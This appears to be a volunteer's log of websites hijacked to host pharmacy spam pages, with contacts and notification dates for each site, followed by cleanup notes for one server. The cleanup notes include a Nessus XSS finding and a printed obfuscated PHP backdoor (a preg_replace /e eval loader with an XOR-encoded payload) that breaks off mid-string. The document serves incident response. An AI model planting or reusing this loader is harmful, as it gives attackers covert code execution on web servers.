https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CFIQFjADOAo&url=http%3A%2F%2Fnfayearbooks.com%2F%3Fnfa%3D147&ei=zFmWUreqOcj2oAS4mIH4DA&usg=AFQjCNHvbMVLhM-OtysNebGQOWvFnYZZ8g&sig2=UDaWFK1voZ9j702tX7zNIA&bvm=bv.57155469,d.cGU
|
Hit 19. qhull.org Part of uiuc.edu (My alma mater!) |
qhull@qhull.org webmaster@www.geom.uiuc.edu https://illinois.edu/fb/sec/7175665 Notified 11-27-13 |
http://www.qhull.org/get-viagra-without-prescription/
|
Hit 20. whiteswanrecords.com |
feedback@whiteswanrecords.com http://cccc.co.za/contact/ Notified 11-27-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIMBEBYwCTgK&url=http%3A%2F%2Fwww.whiteswanrecords.com%2Fwebcomunity%2F&ei=zFmWUreqOcj2oAS4mIH4DA&usg=AFQjCNEuDUjPGMF511XB_epwsPjgjY4Fhw&sig2=Ve5vzSPQwh94djFgBMAApg&bvm=bv.57155469,d.cGU
|
Hits for "Buy Cialis" | ||
Hit 1-2. easyteammanager.com and drury.edu |
Already cleaned! |
|
Hit 3. epmonthly.com Emergency Physicians Monthly, NY |
mplaster@epmonthly.com editor@epmonthly.com info@epmonthly.com Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CFgQFjAC&url=http%3A%2F%2Fwww.epmonthly.com%2Fadvertise%2F&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNGcBxkYuED8Ll9C-K-UXIRhBp0eVA&sig2=XerqOWvX5isgvyuhZZ1jbQ&bvm=bv.57155469,d.cGU
|
Hit 4. enconline.com ElDorado National, bus manufacturer, CA and KS |
info@eldorado-ca.com rmendoza@eldorado.com Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CGEQFjAD&url=http%3A%2F%2Fwww.enconline.com%2Fbuycialisonline%2F&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNG4uz8gygcQtQqRIVWLoJRUY4uRGQ&sig2=Gcq1hPZAWz-nEn53xfqseg&bvm=bv.57155469,d.cGU
|
Hit 5. fabrand.com Seller of duck decoys, KS |
abuse@fabrand.com security@fabrand.com jdavis@bushnell.com abuse@godaddy.com Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CGkQFjAE&url=http%3A%2F%2Fwww.fabrand.com%2Fbuycialis%2F&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNGggBh5qW6-y0vZbJeyMRnrNBwr2A&sig2=oszw8VqQGtnGbduDlye4ag&bvm=bv.57155469,d.cGU
|
Hit 6. bobburdenski.com Fund-raising trainer in Chicago |
Info@BobBurdenski.com Abuse@BobBurdenski.com security@BobBurdenski.com @annualfund on Twitter Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CHEQFjAF&url=http%3A%2F%2Fwww.bobburdenski.com%2Fnc.php&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNF-4s_C1bx03EfQa_Fj7SAs2VMR_w&sig2=cwUZNQJEBShddPgxj__iIg&bvm=bv.57155469,d.cGU
|
Hit 7-10 look legitimate. |
http://www.scamadviser.com/is-buycialisonlineusa.biz-a-fake-site.html
| |
Hit 13. selectyourgifts.com |
service@selectyourgifts.com |
This is apparently a scam site http://inspirationforeverydaylife.blogspot.com/2009/01/scam-alert-wwwselectyourgiftscom.html |
Hit 14. vanguarddefense.com Manufacturer of drones in Texas |
info@vanguarddefense.com media@vanguarddefense.com security@vanguarddefense.com abuse@vanguarddefense.com Twitter: @schipul @Tendenci Notified 11-28-13 |
http://vanguarddefense.com/Cialis
http://vanguarddefense.com/buy-cialis |
Hit 16-17. anewwayoflife.org Website is damaged, cannot load the selling pages |
| |
Hit 19. icrisat.org Crops research org. |
Twitter: @icrisat @CGIAR
ICRISAT@CGIAR.ORG Notified 11-28-13 |
http://www.icrisat.org/cialis/
|
Hit 20.emilystrange.com Clothing and games, |
noah@osmicDebris.com Twitter: @EmilyTheStrange Notified 11-28-13 |
http://www.emilystrange.com/compress/
|
Hit 23. advantageconnectpro.com/ |
info@advantageconnectpro.com Informed via live chat Notified 11-28-13 |
http://advantageconnectpro.com/acp/tadalafil-canada
|
Hit 23. apoptic.com A blog from California |
apoptic@gmail.com abuse@godaddy.com Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=23&ved=0CFoQFjACOBQ&url=http%3A%2F%2Fwww.apoptic.com%2Fbota%2Fbuy-cialis&ei=E3-XUsXTGIb5oASAu4HwAw&usg=AFQjCNHjCKp-tb-oUff3KzkIeNBrA113Pg&sig2=uIJ9dlrt6gq87QeA6GJM-g&bvm=bv.57155469,d.cGU
|
Hit 25. ephudson.com A band, I think |
Twitter: @ep_hudson @PhillnMyself @_kosher
Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=25&ved=0CGoQFjAEOBQ&url=http%3A%2F%2Fephudson.com%2Fwhere-buy-cialis%2F&ei=E3-XUsXTGIb5oASAu4HwAw&usg=AFQjCNG7mJ_BKg7EMqWHWFpD8q4xn2gqjg&sig2=7vXOnx538p_bweUCUEWlsg&bvm=bv.57155469,d.cGU
|
Hit 27. lamazoucheese.com Cheese seller in NYC |
lamazouinc@yahoo.com hachhouch@gmail.com domain.tech@yahoo-inc.com Notified 11-28-13 |
http://lamazoucheese.com/buy_cialis_online
|
Hit 29. www.bsfsry.com Big Fork Scenic Railway, KY |
info@bsfsry.com abuse@godaddy.com busmgr@bsfsry.com Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=29&ved=0CIYBEBYwCDgU&url=http%3A%2F%2Fwww.bsfsry.com%2Forder-cialis%2F&ei=E3-XUsXTGIb5oASAu4HwAw&usg=AFQjCNGDcrRXkh9-mE12psa8GMnP0GffyA&sig2=JNcFVZ-wL6Kg99Pl7Cl_hQ&bvm=bv.57155469,d.cGU
|
Hit 30. ysunews.com Youngstown State University, OH |
techdesk@ysu.edu abuse@ysu.edu security@ysu.edu mbailey@ysu.edu clbidwell@ysu.edu Twitter: @YSUPolice @youngstownstate Notified 11-28-13 |
http://www.ysunews.com/buy-cialis-professional/
|
Hits for "Buy Cialis Online" | ||
Hit 20. rubinsboston.com Restaurant in Boston. MA |
tiffcfeng@gmail.com bostonuadlab@gmail.com info@rubinsboston.com Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CI8BEBYwCTgK&url=http%3A%2F%2Frubinsboston.com%2Fbuy-cialis-online-usa%2F&ei=JomXUug40eigBJzkgYAE&usg=AFQjCNFsDdnlKcmJGS1Sk_WzkaQvLqAVVg&sig2=qM58_P3b_9s2VAUJdczyUg&bvm=bv.57155469,d.cGU
|
Hit 21. elkton.org Town of Elkton, MD |
Twitter: @TownofElkton
administration@elkton.org Notified 11-28-13 |
http://www.elkton.org/sec/
|
Hit 24. camdenhealth.org Camden Coalition of Healthcare Providers, NJ |
http://www.camdenhealth.org/contact-us/
Twitter: @camdenhealth Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=24&ved=0CFEQFjADOBQ&url=http%3A%2F%2Fwww.camdenhealth.org%2Flogin-options%2F&ei=yIqXUpGCEov8oATE24DgDw&usg=AFQjCNEn7PmNWUPZRmGUDC3R06LrKw026Q&sig2=FgkDg5a_J3kJ9pguNNyv-Q&bvm=bv.57155469,d.cGU
|
Hit 32. imintcenter.org DARPA Research Center, U. of Colorado |
leeyc@colorado.edu fitzstephens@colorado.edu Twitter: @cuboulder Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=32&ved=0CEIQFjABOB4&url=http%3A%2F%2Fwww.imintcenter.org%2F&ei=FY2XUu70FsbpoATDioL4Cw&usg=AFQjCNH39noUwCOMi2va9wg_IATUF2zNQQ&sig2=vqeIlTmoSm0OgtOm5CdS3g&bvm=bv.57155469,d.cGU
|
Hit 33. thesemblog.com Web marketing company |
along@schipul.com Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=33&ved=0CEkQFjACOB4&url=http%3A%2F%2Fthesemblog.com%2FCialis%2F&ei=FY2XUu70FsbpoATDioL4Cw&usg=AFQjCNEW3JLQKT-8e3iXVcfQik7L8dubIg&sig2=6tDldtS5X78vDML-7emR-Q&bvm=bv.57155469,d.cGU
|
Hits for "Buy Levitra" | ||
Hit 1. amahouston.net Marketing in Texas |
info@amahouston.org Loaded the rogue page once, but not again ? |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CD8QFjAA&url=http%3A%2F%2Famahouston.net%2Fpage%2F2%2F&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNHhyjsT9CxOmYcsHOezVeCqMxEJ2g&sig2=KY0DGCO5y3iBfWXJ8jrCag&bvm=bv.57155469,d.cGU
|
Hit 3. www.workamper.com Employment in Arknsas |
support@workamper.com john@workamper.com Notified 11-28-13 |
http://www.workamper.com/buyvardenafil/
|
Hit 5. missillinois.org |
ILStateDir@missillinois.org statedirector@missillinois.org Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CGEQFjAE&url=http%3A%2F%2Fmissillinois.org%2Fbuy-levitra-now%2F&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNFY-ZoBxQ14fbGabwcZU6OIgpEt2A&sig2=XOQDMQ7cf4NqMJ-2blkXbg&bvm=bv.57155469,d.cGU
|
Hit 6. www.theoriginalscrapbox.com |
http://www.theoriginalscrapbox.com/contacts
Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CGgQFjAF&url=http%3A%2F%2Fwww.theoriginalscrapbox.com%2Fapp%2F&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNFjTsOqDiUp6a69N_jQ55x6TPLzKw&sig2=7azPXBhIA8JoaAc88fokuQ&bvm=bv.57155469,d.cGU
|
Hit 7. www.capitolcorridor.org A train in Oakland, CA |
http://mygov.us/task/city/knowledge_base/submit_request.php?cityname=368&module=rt Notified 11-28-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CG8QFjAG&url=http%3A%2F%2Fwww.capitolcorridor.org%2Fabout_ccjpa%2F%3Fy2fwa%3D427441&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNERTepzJQanRWT-wJJwcoCH_mIxag&sig2=53YLw06eTrqji6hTxghprA&bvm=bv.57155469,d.cGU
|
Hit 13. ohsweb.ohiohistory.org Ohio Historical Society |
collections@ohiohistory.org http://www.ohiohistory.org/about-us/contact/website Notified 11-28-13 |
http://ohsweb.ohiohistory.org/strocs/
|
Hit 18. www.caratsmartdiamonds.com |
abuse@godaddy.com ahadany@cox.net abuse@caratsmartdiamonds.com security@caratsmartdiamonds.com Notified 11-28-13 |
www.caratsmartdiamonds.com/buy-levitra-overnight/
|
Hit 20. primogrill.com |
http://primogrill.com/contact/
Notified 11-29-13 |
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIoBEBYwCTgK&url=http%3A%2F%2Fprimogrill.com%2Fcategory%2Fbuy-levitra-uk%2F&ei=uriXUqLYHJTnoAS3l4GwBA&usg=AFQjCNH9WoyKVZ976hSgxrPgXjNfPmCAQA&sig2=3-qDh5IgEOazWlZ_11l8sQ&bvm=bv.57155469,d.cGU
|
For my part on the near.org web site I have replace the rogue .htaccess file and deleted two files that it pointed to. I am not enough of a hacker to know how to proceed from here.
"Did a Nessus scan of the box earlier. It found... Web Server Generic XSS Description The remote host is running a web server that fails to adequately sanitize request strings of malicious JavaScript. By leveraging this issue, an attacker may be able to cause arbitrary HTML and script code to be executed in a user's browser within the security context of the affected site."Some of the modules for the CMS software seem to have been recently replaced. Some of the directories within ~/stecon/WWW/modules/ are new and are owned by www-data (Yes, apache shouldn't have been able to write there: first of probably many apologies from me). In particular, the file ~/stecon/WWW/modules/nuSOAP/nuSOAP.module.php now had a 20K block of multiply-encrypted code at the start. I include below the results of base64-decoding the code.
preg_replace("/IwOIddDwZObky1eqwBAZlfY/e", "tdwoOjAFLo6kk2xR0Edy2OWnj5UI7MsoqeS6DT=P96zhwmzuqRhhg5JEydNtq7WVapQd9Qs6Lh c8IQryiOVEIeJ79WonRA0rpPKmf3hqZ=nhQTVyhq3pKBkHXOvpOuV40ffdXCJwBwTREoFmU9Qe0 2mVEW=SGVLE2qiNtr=ucTBh8GIRDYwCPXXTuXm1sx5jdcxLJw7lE8IBDQSHpDJ5bhNK6z=nm5LE V9QfuMGyJO1MfIUJMeDnARy7GxisruxCrChaOnOY2EkVM6fZYjCZ11U7m4oSmaUTd2use0FUCqq PkKp9trXjgseHkHaMivfAmPsFNyaQdFfCQJA=1YiWFCeqK63spXsRmaX1NxFq4ltJvtIlGq8Mta 34Uuk=GSQtsni7aolTOUc0DkjKQfW07N3P8bPDtfwbIUWj993MRUKU6ufKP2JKEAaAcpELK2mSK 03I7uUNDei9OCId4Sn8TC9vsC734iJCgBLbvfpz=MxNO7qHNTEgWCRDEN68vE=QGLr2qWqqic5x Xj6k40GOBYSFlNCVSClYNSP5o6kLWd0tB4T62aJ3yc9Yp=t9CTWQllKPgua3MYlOQ6IHUS=Iu8g Y8PW=jsPKTZZzI1rUOSieMrmh0lpsiLGface0KuJdIiRRX0llQJFd2s=zTph21nWQF1PQjYts8A 0T0k6Ot=rjsrYAV63LiNcnCs4mGmTCmRWl2Q1kQhJ9Oh9kczv=CNnE6grBH=DuRZVIqKt7s357Z 3f3rQ2tddyY0eZGdd2v3L4iWmeDdX04Pdv7tloMEblD7=KYcAJULC4hoWkHujA0Bv5vVi9a=id6 hnT=ncUzeMWHj8PSfPRh=LSVtPvsxNnU27UeXoT32p=alOtGd=odK7y5Kim9vORmJlFhPYZFDYf pnNvGNZjXUWRf54cpGtRQTWyivMoylJcNXNUkm498PObIH4yOmEe6bSdMfH=FQcTopnNRfLNvao 4hhrwIwPDNigZCnZH52bhgDvyj7ATWpM5M5pUp6X4c5SehrmaiC9EGs3po40AiK5uDiDtcbl5U4 Y2k=RICPMI9Exm9wmf7fP=CSsfuTZDMx6xxM6zbG8YLu=IglobG4aJLIo6cC0pz5bmFVahcX6nH 6wngZEnRfwdnZXFcWuRPK4VgT39qxlysWbNwf1D=mgnB5sdPbufmn1H7sEmeqaLC2ZyVP2V2W93 PpVfGF=ss1zoh5QAkrMmhmZ43QOtmLk327W8AWptLdWsXnt8T7i2i9uZN9H1Jss=nE8nalWmEsT cVCYp98fg6O6HMC9VupVXtRAJ3Wv8EEYZGxEEujkoyfw=huVRYqpH8pQzBAwGFJgL8kQqI1U8VF 74zRKN8zU5elsgmdmrnH3jrIP10jwTpsLd0Vr7KAzomgJN=w5n4wMk5ba3ALLp5XI3t1x41mhbH rpHdiuVU87NYVFYhRDaoMSXBFQ3rxTze978gqS1nNDAjJZFacfEpybq4rije2X0zT6U=NKmbNn= XBExek3IXSzP=WzeNMcBfXWflgHBuuAGvF5OpvWCDLRChGhuS0wyWHS8nZ9WI0d5DWItGfvJqCM MIt8assNEzgAc60zD9R9AoFuuke5PgGcozYEhFSl6ymXtlLxidujGzS2ZwuoS1F8peAMkSxeGZ2 z=CmifVGmKYcjJMNbCTYrxY4Xrq2xFsmEvNmQjt3tGTSQggsizFOmdH0Ky184ij9SwkiUSaDYuW oP4VxsaBT5JSD8HA1qjy0VXhqq8tEqFt69Dspet0Y3QczYcpDBcBW1iBffvjK2RFzVxe1gcOYtq NGI3KJTMfIvhoPRNaIfg81Taqz35NkjarrR31lDVuy3XDJkdRE0O6SokGgdUGCuxuBojms6Vgxt j8TCOYBcSTF4alWurYdeHeIrG1mbVYJ6Ud8i29AIQFBqrXaXw525Y=lezM7KlFE7iAdY9ehOji6 P7UnsNelmdMFSYAc=Gg6ohYBe3itaGnqC8SuKwUwPh3h64060fzmBMogDMOeT3JVycE0OZvd7m= 2e0vddjEfwtAz6PTNGdj66n4IBom8PlyukiMDHRi4=js6zAI6dr1YTsgVWISluFUTohWvy6oydV tRW3M1iBN3uuNF4frmlB6OiR=WLnKp048VuIKSKYK5IX=A3qmdrhrPyql=SvpRolmYuwq5K1xTN wTFc7iIdOXR60RNu7eXgFwP3cIBS7UfsokJkISCWqURoleXg9vBChR50a7QWQvD5VNedgh1L2Gz blM9i9=leQfdratCqeGk1UET1lIAcP151B2Y=10eGd8x5q1kK7K=POSF1bFRq6Kg8A5724a8VXu OCjyMf9MvMe1B66Sl1dHwdAsT4HQOe=dhjRtDP6zbZpcUkv7ZNCKrC3=7=QJdPn=z5t4IorjDVB X7wSU=UfqXXpTW7c1KF1=0j3GMiqP5rnzc7JbPoGnAw7WsYM4dB3bktixRNCK5p=WkIy1w6cwrY IYwUQPWHq71NsGauRTZQq0ZdzKXR8DpFbbZrqwzVrpjZw=JCTiT0htbV4zm13R6TsUAXFztxdSL PRUSl4ljZTAuMzWCqn8=VR=tWycJRuUgBpzmhZL7tLq7=B9qp6pALoticKru6BQ7qEhNesJM5zI 52Fjg=OgL4OtVZZETbVOGZwU4edFYSNRIT1pTEKe8ZMRymWGCrVJFHe0m8E=ORQXlGB5KMXHlkZ ZLvgOb2Yh03fkzjkD22bc8dVHptOQSopeYKt1BGWA03kxbK1SAQu9tFEYyToF8TkVeSKgYhgWYG J1Q0HRP3O08SXumA1jUZ5zrDUFk1c07lyMk7d1xsyuALemMTKgtDUZHofre8paidnHYG9Lyw6y8 YaIskoao01vnVcHRHh1kK80Q6JDqE3mdRuK3YlgWaR=vtGC2o3ayzYDtiHZm=AERuOIIzpfP7eA plCfO67CuUGd3N3dN3iemxnumRO2Nt34T6YizUkjoqBg540GvhlWTNG6fUwtDnmWh=5WTe69J8d CzcJj0u7S9BNdW0MZmyvJypgHIbESXiVM=fw0OrQMtdqEc3dDpOMc5tjBJnUgKpsKJeIYKZl43Q 9UHaXwpkOiSxkba59ljqvsJ5GUTrNK8KfEl41QcDyv2YMQSK321nj=hpU1VhASsfWTXLj1PXkGv xXC8O4x3cwYGFNbnNuUtFnFRM6hjfnTR=WNOP=Frwex3rOe69znDcsUon3MHegYe4mtImzzXSmO =2t5zhh30PMm3Dz=iVYBO=vWljK02xN1n7uccRUaghCYk3XIMwKav6xWd8VUuiJXe5z7KJWrqZE PQcYdOi50cqV7nrPWPZttSipdrAJWZOmpr=I6iB5=rP7T7KpLjY538iVnje=9tlnalv"^"\x11\ x12\x16\x03g\x0d\x3b\x2f\x22\x09Z\x0a\x1fWP0Q6\x01O\x06\x103\x0b\x09Z1\x2c\ x1foF9\x1dR\x06\x0f7b\x7b\x26\x12T\x1c\x29\x05\x05\x03\x11\x23\x60\x3b\x0d\ x2cp\x1f\x29M\x0c\x2d8\x1cf\x23\x3c\x17\x12\x1d\x00\x08\x10\x17\x05\x29\x2f 6qp8\x0bM\x02\x18\x2ej\x02T\x0cTu\x2d\x1aEjt\x5b\x02C\x09\x01\x035\x04\x5f\ x13hG\x21\x5f\x1c\x0e\x1f5\x22I\x00\x06\x3a\x26\x041\x0875\x40\x3c\x26=VW\x 2c\x0fT\x0d\x2a\x2f\x23\x11Ef\x3c\x24\x5c\x10\x1c\x21\x0e\x182U\x60\x09\x1e \x29\x1aX\x3c\x16\x3b\x0f\x27\x03\x0b\x1bw\x19\x16DGVa\x09\x04h\x0bf\x1a\x0 6\x21O\x27\x3ea0\x7b\x03\x2d\x0fa7K\x01R\x22\x13W4\x18\x3fm\x03\x15mz\x24\x 14zg\x0f\x5f\x7d\x2d\x60P\x27\x08\x3ex6d\x16\x3aM\x2f\x10\x0e\x0b81\x19\x7f \x26\x0338\x00=\x00\x027\x06\x04\x06\x7d\x5b\x18\x01\x3bAuW\x075AEK\x26\x22 \x17=S\x0b\x1d\x236\x00\x09\x2e\x2c\x17qPj\x09\x1b\x0e9E\x01\x02FTZ\x5f\x0b 8\x0a\x608\x22X\x18\x3fP\x021\x16\x1a\x25F\x06\x04\x3a1vAB\x11\x1f\x3e\x1a\ x01=\x26\x02\x12\x25\x1f\x40\x17\x10\x3b\x0010\x24\x0d\x12e\x26\x0e\x2f\x06 2\x21\x27pF3\x2e\x21\x0aw\x08\x07\x7bGU\x11\x3f\x20\x25\x22\x2633\x02\x23S\ x2b7\x7d\x09A\x1e\x2430\x1e\x3f\x2bO=\x1bRD\x7b=\x21\x12h\x1f\x06i\x07\x27\ x3b\x22s\x20\x04\x27\x2c\x22\x14\x0f\x5dq\x1e\x3c\x1c\x3f\x2e\x12\x5d\x06\x 2dX\x19\x0e\x0e\x1d6=\x09\x1d2\x22m\x1c\x0e\x7eV\x5e\x17\x2b\x26\x1d2B\x18\ x0d\x124e\x21\x02\x07\x0b\x03j\x2f\x3f\x2e\x20\x09\x60\x3a=\x1ei\x01\x18f\x 5e\x11y\x11T\x3ex\x0c\x10y\x1d\x07\x04\x20\x13\x15\x2bZN\x17\x0eBC\x02\x20\ x00\x0b\x0e\x26\x21\x08\x2cSI\x23O\x3a\x11\x01\x00D\x2b\x2c\x07\x23\x03\x2f \x18\x16g3\x1c\x27lH05\x0ff\x12\x7d\x1bx0\x3a\x3b\x03X\x0d\x02\x3e\x28\x00B \x5cVw0\x3f\x11\x2db\x09\x05\x26\x0e\x1c\x125==\x2f\x17\x15R\x0ez\x18y\x3eT \x5b\x3c\x26z\x04Wh\x2c\x23\x5f\x11\x02\x5d8I\x7f\x20Kw\x19\x07\x21YU=\x3e\ x23\x1d\x22\x0a\x14m\x5c\x60\x10\x5fx\x29\x17\x7c\x05\x1e\x2dOQ\x0er\x27xr\ x04K\x08\x13\x7b\x0b\x13\x3e\x02k\x3f6\x19\x02\x2f\x1f\x02\x28\x26Z\x7f\x5f \x0a2\x26975\x20\x15\x23s\x259\x10Q\x10\x0c\x17\x3f\x0bs\x1d\x3f7\x3e\x03\x 08C\x3en\x3c\x0e\x17\x06tx\x27\x19\x3a\x02Ifa\x3e\x12F6J5XgQ\x01\x0ex\x25\x 12\x16\x23\x12=h\x19\x26\x0fi\x0dQ\x2a\x0b\x2d\x14\x12w\x5e\x7f\x3b\x18\x16 \x1b\x261\x28j\x06\x00\x03\x18\x05\x10\x09\x23\x03T\x0a\x01\x29\x5dt\x11\x2 f\x20\x12l6\x13\x17\x12\x161\x2d\x3f6\x2c\x08\x1a\x1a\x03b6BCp\x2eP\x24\x60 \x01\x3bP\x3e\x20\x0076Y\x22\x2c\x0eR\x21\x1d\x1d\x06\x20\x04\x00\x15\x1bW\ x2f\x151cF7\x03\x20P\x05\x0aY\x7b6\x0c\x5b\x00Qp\x22\x2f\x05x\x09g\x19\x2aC \x0d=f\x249FX\x0cr\x2e1\x1e1\x25\x0eo5\x7f9\x11\x7f\x3b\x01\x16y\x26\x2a\x1 7NP\x24\x10\x0c\x2dHaj\x04=\x17\x5c\x7e\x0d\x27\x04\x40\x273\x20\x3a\x14\x1 9\x01\x0bqd\x02\x13\x15\x15a\x19\x00\x7b\x13\x24z\x10\x29\x12MX\x20\x07rOb\ x3c\x2c\x05U\x00\x06b\x2e\x0b\x1b\x2f\x03\x078\x0a\x14\x23\x15\x07\x5b\x17\ x00\x3a\x11=\x2c\x3bs\x0f\x1f\x28\x01\x1eN7D\x121\x17\x12\x04\x16\x12\x3b\x 10\x02\x0966\x05\x02\x01\x0b\x06\x19\x26\x06M\x60l\x01\x03\x23\x2e\x2af\x08 \x2c\x0e\x11\x08\x5c\x2b1\x06\x06\x1e\x0aJ\x00\x3a2\x01\x1c\x1cV\x24\x11P\x 0a\x7b\x274\x21L\x090\x2a\x27\x0357\x03\x03\x11\x09\x09\x01Y\x3cp\x05\x5b\x 1a\x5dW\x2d1\x2bAu\x20\x00\x11\x05xmx\x5b\x01\x01\x02\x40\x0a\x07\x2fm\x29\ x11\x3e\x3a8W\x5ert6\x26Bw\x26\x1bu\x7e3\x5e\x3fD\x07\x29\x28\x2e=\x09\x0f\ x20\x7dzCmf\x1dsaf7\x01\x3a\x03Q\x01L\x3bt\x00\x3e\x0c\x40\x23\x21X\x24\x09 0\x03Lm\x22\x2e\x0b\x19N9\x0a\x14\x7b\x17\x21\x2fm\x2b\x16\x2fE\x25\x26\x26 \x20\x07\x2cm\x2d\x2f\x0a\x23\x04u1\x7bG\x1b\x02QS\x1b\x1f2Y\x27\x27\x2d\x1 9\x23\x03\x19\x04\x02\x1114\x1e\x3f6\x20\x29\x5f\x3e\x0b\x02\x15\x27Z\x7d4\ x02\x1b\x2e\x1d\x2e\x1cRG\x19\x2a\x03\x12\x11\x2b\x19\x24\x08f\x17\x7c\x25\ x24\x274X0\x2b\x1b\x3aA\x25\x17\x17\x040\x1c\x5cr\x03T0X\x3e\x2e\x0a\x13\x2 d\x27\x04G\x1bF\x1eST\x1d\x20d\x0a25G\x0b\x25\x02\x2059\x00\x02\x0d\x4055\x 05\x20\x3cqsw\x21y\x12\x22\x25\x00\x01e\x02\x03t\x2356\x0d\x02\x08\x26\x1c\ x0f\x29\x10\x7bao\x2aQ\x28\x0d\x1a\x09\x0aIxT\x0d\x01\x14e\x1e\x10z9\x2a\x5 fn\x066\x0a\x12\x0e\x240\x3eA\x60H\x16\x1dZ\x04O\x3e\x1b\x01o\x003\x01\x274 L\x0a\x28zQ\x60=Y1\x29i\x2b\x2bK\x13\x0e\x13\x1c\x26\x1e\x290\x1axG\x24f\x3 fr5\x2a\x3c\x0d\x226L\x11j=6\x3f\x22\x06y\x7b\x28\x1f\x07\x00Z\x14\x0b\x19\ x08BnH4\x1d\x21\x7e3ed6\x19\x15\x0d\x05V\x22Y\x1e\x09\x7e\x29\x1a\x7b\x05uA \x3c6a\x0a\x104Ts\x2f1C9\x29=\x1eBPaz\x04\x1aC\x16LX\x1d\x27\x05Q9\x06\x24\ x2e\x1a\x08\x5e\x3a\x05z3p\x0eBw\x29\x255\x22K\x27\x240\x3a7\x26\x19\x5d\x0 f6\x11\x23\x3c\x0e\x3eb\x14\x3b\x0e\x07\x1a\x1b\x04\x15\x1eX9\x19\x24=\x5c\ x7cGm\x1d4\x11t\x14\x29\x092\x20\x1e\x3f\x1f\x1b45\x063\x2e\x10\x25B7\x05\x 22=\x5f\x09VQ\x19\x7cz\x16\x2az\x22\x2b\x7f\x2b\x12\x1a7\x10J\x2b\x05\x7df\ x081\x0f\x26Id\x20\x03\x02\x1dR\x26\x08\x2c9\x02TLx\x2f\x40E4\x3e\x1a\x2cC\ x24\x26F\x0ep\x05\x078\x0e\x19\x17\x0c\x04\x1d\x1f\x15\x08\x3e\x24\x09\x0e\ x27\x14\x0f\x00\x02S4\x0c\x20\x24\x27\x22\x0b\x17\x0e\x13\x29\x25\x1f\x17q\ x17PT\x3c\x3f=\x7c=\x1e\x27\x19uT\x2f\x01Ifj\x0d\x1c\x2d\x279\x07Vo23\x14\x 1a\x1c\x10\x2a\x13\x5c\x23\x23ZQ3\x1a\x0aM\x0dx\x2e\x0c\x10\x24=\x2319\x19\ x1c\x1f7\x04e\x7d\x13H\x07\x0ex\x07\x13\x12\x3a03\x1dz\x20\x0dw\x3a\x22\x2e \x1b\x0c\x00\x00\x0e\x3a8\x28\x01\x03\x29\x04c8\x06I\x23\x60\x19\x20\x13\x0 5\x0d2\x11\x1bt\x40z=\x02\x0fAT5t\x2e\x01\x03\x0f\x14\x05\x25Q0\x19\x3b\x10 \x11\x5c\x0f4I\x08\x04\x5f\x05x\x001\x0a\x260\x048\x2d\x0f\x004\x2e9\x0c\x3 f\x17\x099q\x05\x0c\x1bd\x03\x7f\x1bn\x03\x10\x065w\x1bw\x2b\x40\x18\x7d\x1 a\x15\x01\x08\x10\x7e\x40\x2a\x19\x3c\x3c\x40\x7e8Vf5\x0b\x0b\x0e\x5b\x20\x 10\x22\x2bcs\x05\x2d\x17\x2992\x1cG\x15\x1f\x0f\x23IR\x5fU\x2d\x7c\x14\x2c\ x24\x08\x22\x26\x7f\x2188\x00\x09\x10\x2f\x2f\x0a\x1b\x16\x16\x20\x2c\x2b\x 00m\x03m\x19\x1a9wB\x00\x0d\x5f\x10FBdQ\x7f\x1b\x0c\x3a\x14\x11A\x1a\x1d\x1 d\x22\x22\x21\x29h\x1d\x037\x403t\x0f\x2825\x09\x24\x2eD\x3a\x2d\x5f\x26G\x 5d\x2cQ\x11\x12\x0cU\x3cz\x0c13H\x25\x01\x0aR\x28U0\x14Y6\x27S\x10\x29\x13\ x02\x11Z\x28Ib=\x0b\x60\x01\x2eU\x0aq\x7dn\x07\x05\x3c7\x26F\x3e\x2c\x0d\x2 5\x7b\x01A2\x0d\x04\x20\x3e\x00yz\x1bw\x08\x1c\x5d\x28\x23\x01t\x24\x0b\x3c \x3a\x06B\x27a\x27\x24\x11\x7c\x00=\x3f4\x00\x28j\x2djR\x0f\x08P\x01\x29\x3 f\x0e\x2a3\x7c\x27\x15Y\x21\x3b\x3b\x0bI\x02\x1d\x25\x1c\x3b\x21\x1a\x11r\x 23\x03\x60\x03oe2\x20\x09\x03\x28X\x17\x14\x3c\x3b4\x02\x07\x23f\x0d\x2fwCv \x0fG\x3cr\x04\x05h\x00\x06\x19\x2b\x3e\x21\x2c\x17\x1b2n\x18\x60\x29\x3b\x 07l=\x0ebn\x1al\x1e\x3a\x17\x15\x7ci\x1d\x1b\x2c1\x05\x1b\x2c\x29\x3b\x01a\ 